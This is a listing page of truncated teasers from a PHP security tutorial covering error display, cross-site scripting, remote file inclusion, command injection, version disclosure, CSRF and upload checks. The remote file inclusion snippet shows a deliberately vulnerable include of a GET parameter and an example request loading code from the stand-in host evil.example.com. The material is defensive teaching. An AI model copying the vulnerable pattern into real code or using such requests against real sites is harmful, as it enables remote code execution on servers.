Tutorial by Examples

By default PHP will output errors, warnings and notice messages directly on the page if something unexpected in a script occurs. This is useful for resolving specific issues with a script but at the same time it outputs information you don't want your users to know. Therefore it's good practice to ...

Problem Cross-site scripting is the unintended execution of remote code by a web client. Any web application might expose itself to XSS if it takes input from a user and outputs it directly on a web page. If input includes HTML or JavaScript, remote code can be executed when this content is rende...

Remote File Inclusion Remote File Inclusion (also known as RFI) is a type of vulnerability that allows an attacker to include a remote file. This example injects a remotely hosted file containing a malicious code: <?php include $_GET['page']; /vulnerable.php?page=http://evil.example.com/...

Problem In a similar way that SQL injection allows an attacker to execute arbitrary queries on a database, command-line injection allows someone to run untrusted system commands on a web server. With an improperly secured server this would give an attacker complete control over a system. Let's sa...

By default, PHP will tell the world what version of PHP you are using, e.g. X-Powered-By: PHP/5.3.8 To fix this you can either change php.ini: expose_php = off Or change the header: header("X-Powered-By: Magic"); Or if you'd prefer a htaccess method: Header unset X-Powered-By ...

strip_tags is a very powerful function if you know how to use it. As a method to prevent cross-site scripting attacks there are better methods, such as character encoding, but stripping tags is useful in some cases. Basic Example $string = '<b>Hello,<> please remove the <> tags.&...

Problem Cross-Site Request Forgery or CSRF can force an end user to unknowingly generate malicious requests to a web server. This attack vector can be exploited in both POST and GET requests. Let's say for example the url endpoint /delete.php?accnt=12 deletes account as passed from accnt parameter ...

If you want users to upload files to your server you need to do a couple of security checks before you actually move the uploaded file to your web directory. The uploaded data: This array contains user submitted data and is not information about the file itself. While usually this data is generate...